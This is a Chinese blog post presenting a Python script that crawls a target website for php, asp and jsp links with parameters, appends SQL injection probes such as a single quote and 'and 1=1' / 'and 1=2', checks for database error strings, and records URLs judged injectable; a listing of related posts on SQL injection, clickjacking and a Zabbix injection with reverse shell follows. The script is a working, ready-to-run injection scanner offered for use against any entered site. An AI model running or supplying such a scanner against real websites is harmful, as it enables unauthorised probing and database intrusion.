前言:

昨天晚上其实就已经写完代码。只不过向FB投稿了,打算延迟一晚上在写博客

所有才到今天早上写。好了,接下来进入正题。

思路:

1.从网站源码中爬取那些类适于:http://xxx.com/xx.php?id=xxx的链接

2.将这些爬取到的链接写入一个URL

3.加入payload

4.用正则过滤掉一些残缺不全的链接

5.将一些报错语句加入一个列表

6.从报错的语句中寻找错误

7.判断字符型注入或数字型注入

代码:

 import requests,re,time,os

 from tqdm import tqdm

 from bs4 import BeautifulSoup

 def zhuru():

     global x,headers,ps

     user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站

     url="{}".format(user.strip()) #去除两边的空格

     headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

     request=requests.get(url,headers) #浏览器头

     shoujiurl=[] #创建一个收集URL链接的列表

     rse=request.content

     gwd=BeautifulSoup(rse,'html.parser')

     php=gwd.find_all(href=re.compile(r'php\?')) #寻找后缀名为php的链接

     asp=gwd.find_all(href=re.compile(r'asp\?')) #寻找后缀名为asp的链接

     jsp=gwd.find_all(href=re.compile(r'jsp\?')) #寻找后缀名为jsp的链接

     print('[+]Collection URL ')

     for i in tqdm(range(1,500)): #进度条

         time.sleep(0.001) #进度条

     for lk in php:

         basd=lk.get('href') #提取其中的链接

         shoujiurl.append(basd) #加入列表

     for ba in asp:

         basd2=ba.get('href') #提取其中的链接

         shoujiurl.append(basd2) #加入列表

     for op in jsp:

         basd3=op.get('href') #提取其中的链接

         shoujiurl.append(basd3) #加入列表

     print('[+]Collection completed')

     huixian=[]

     huixian1 = "is not a valid MySQL result resource"

     huixian2 = "ODBC SQL Server Driver"

     huixian3 = "Warning:ociexecute"

     huixian4 = "Warning: pq_query[function.pg-query]"

     huixian5 = "You have an error in your SQL syntax"

     huixian6 = "Database Engine"

     huixian7 = "Undefined variable"

     huixian8 = "on line"

     huixian9 = "mysql_fetch_array():"

     huixian.append(huixian1)

     huixian.append(huixian2)

     huixian.append(huixian3)

     huixian.append(huixian4)

     huixian.append(huixian5)

     huixian.append(huixian6)

     huixian.append(huixian7)

     huixian.append(huixian8)

     huixian.append(huixian9)

     for g in huixian:

         ps="".join(g) #过滤掉[]

     payload0="'"

     payload1="''"

     payload2="%20and%201=1"

     payload3="%20and%201=2"

     for x in shoujiurl:

         yuan="".join(x) #过滤掉[]

         ssdx="".join(x)+payload0 #添加payload

         ssdx2="".join(x)+payload1

         ssdx3="".join(x)+payload2

         ssdx4="".join(x)+payload3

         pdul=re.findall('[a-zA-z]+://[^\s]*',ssdx) #过滤掉一些残缺不全的链接

         pdul2=re.findall('[a-zA-z]+://[^\s]*',ssdx2)

         pdul3=re.findall('[a-zA-z]+://[^\s]*',yuan)

         pdul4=re.findall('[a-zA-z]+://[^\s]*',ssdx3)

         pdul5=re.findall('[a-zA-z]+://[^\s]*',ssdx4)

         psuw="".join(pdul) #过滤掉[]

         psuw2="".join(pdul2)

         psuw3="".join(pdul3)

         psuw4="".join(pdul4)

         psuw5="".join(pdul5)

         try:

             resg=requests.get(url=psuw,headers=headers,timeout=6)

             resg2=requests.get(url=psuw2,headers=headers,timeout=6)

             resg3=requests.get(url=psuw3,headers=headers,timeout=6)

             resg4=requests.get(url=psuw4,headers=headers,timeout=6)

             resg5=requests.get(url=psuw5,headers=headers,timeout=6)

             if resg.status_code == 200: #判断状态码是否等于200

                 print('[+]The first step is completed, and the goal is to be stable')

                 time.sleep(1)

                 if resg.content != resg2.content and resg3.content == resg2.content:  #判断是不是字符型注入

                     print('[+]Existence of character injection')

                     print(resg3.url)

                     print(resg3.url,file=open('character.txt','a')) #如果是写入脚本

                 elif resg4.content != resg5.content and resg4.content == resg3.content: #判断是不是数字型注入

                     print('[+]Digital injection')

                     print(resg3.url)

                     print(resg3.url,file=open('injection.txt','a')) #如果是写入脚本

                 else: #两者都不是

                     print('[+]Sorry, not character injection')

                     print('[+]Sorry, not Digital injection')

                     print(resg3.url)

                 if ps in str(resg2.content):

                     print('[+]The wrong sentence to be found',ps)

             elif resg.status_code != 200:

                 print('http_stode:',resg.status_code)

                 print('[-]Sorry, I cant tell if there is an injection')

         except:

           pass

 zhuru()

测试结果如下:

python打造一个分析网站SQL注入的脚本的更多相关文章

  1. python打造一个Mysql数字类型注入脚本(1)

    前言: 总是想写一个sql注入脚本,但是之前的那些都不行. 这次做好了准备,然后嘿嘿嘿. 准备: sql注入的基础知识 熟悉怎么判断 正文: 思路概念图: 这里我没有限制用户输入,不限制的话可能会 @ ...

  2. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  3. Python预编译语句防止SQL注入

    这个月太忙,最近不太太平,我的愿望是世界和平! ================================== 今天也在找python的预编译,早上写的sql是拼接来构成的.于是找了2篇文章,还 ...

  4. phantomjs + python 打造一个微信机器人

    phantomjs + python 打造一个微信机器人 1.前奏   媳妇公司不能上网,但经常需要在公众号上找一些文章做一些参考,需要的时候就把文章链接分享给我,然后我在浏览器打开网页,一点点复制过 ...

  5. python之MySQL学习——防止SQL注入

    python之MySQL学习——防止SQL注入 学习了:https://www.cnblogs.com/xiaomingzaixian/p/7126840.html https://www.cnblo ...

  6. 一个PHP的SQL注入完整过程

    本篇文章介绍的内容是一个PHP的SQL注入完整过程,现在分享给大家,有需要的朋友可以参考一下 希望帮助到大家,很多PHPer在进阶的时候总会遇到一些问题和瓶颈,业务代码写多了没有方向感,不知道该从那里 ...

  7. Zabbix sql注入漏洞脚本执行反弹shell

    exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...

  8. zabbix(sql注入判断脚本)

    zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...

  9. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

随机推荐

  1. 浅谈 Mybatis中的 ${ } 和 #{ }的区别

    好了,真正做开发也差不多一年了.一直都是看别人的博客,自己懒得写,而且也不会写博客,今天就开始慢慢的练习一下写博客吧.前段时间刚好在公司遇到这样的问题. 一.举例说明 select * from us ...

  2. Python scrapy框架

    Scrapy Scrapy是一个为了爬取网站数据,提取结构性数据而编写的应用框架. 其可以应用在数据挖掘,信息处理或存储历史数据等一系列的程序中.其最初是为了页面抓取 (更确切来说, 网络抓取 )所设 ...

  3. SpringBoot(七):集成DataSource 与 Druid监控配置

    绑定DataSource:Spring Boot默认的数据源是:org.apache.tomcat.jdbc.pool.DataSource,Druid是Java语言中最好的数据库连接池,并且能够提供 ...

  4. 框架学习笔记之Mybatis(二)

    一.动态sql 通过mybatis提供的标签,实现sql语句的拼接. 1.where <select id="findUserList" parameterType=&quo ...

  5. 利用typescript生成Swagger文档

    项目地址:https://github.com/wz2cool/swagger-ts-doc demo代码地址:https://github.com/wz2cool/swagger-ts-doc-de ...

  6. React Native(十五)——RN中的分享功能

    终于,终于,可以总结自己使用RN时的分享功能了-- 为什么呢?且听我慢慢道来吧: 从刚开始接触React Native(2017年9月中旬)就着手于分享功能,直到自己参与公司的rn项目开发中,再到现在 ...

  7. ls-dyna基础教程

    刚刚开始使用ls-dyna,几天前还只知道点开dyna界面,然后就没有然后了,没人带,资料也没多少,但是科研还得继续往下做呀(手动滑稽),通过在仿真论坛上搜索相关的资料,并通过自己的一步步操作,做了大 ...

  8. hash详解

    首先介绍一下hash? 事实上是一种叫做蛤丝的病毒 hash的做法: 首先设一个进制数base,并设一个模数mod 而哈希其实就是把一个数转化为一个值,这个值是base进制的,储存在哈希表中,注意一下 ...

  9. hive中No space left on device问题或者Java HotSpot(TM)64-Bit Server VM warning:Insufficient space for shared memory

  10. Logistic Regression vs Naive Bayes

    相同 逻辑回归和朴素贝叶斯都是对条件概率\(P(X|y)\)进行建模,使得最终的分类结果有很好的解释性. 不同 具体流程 逻辑回归: 假设\(P(y=1|X)\)满足逻辑函数\(h(z)=1/1+ex ...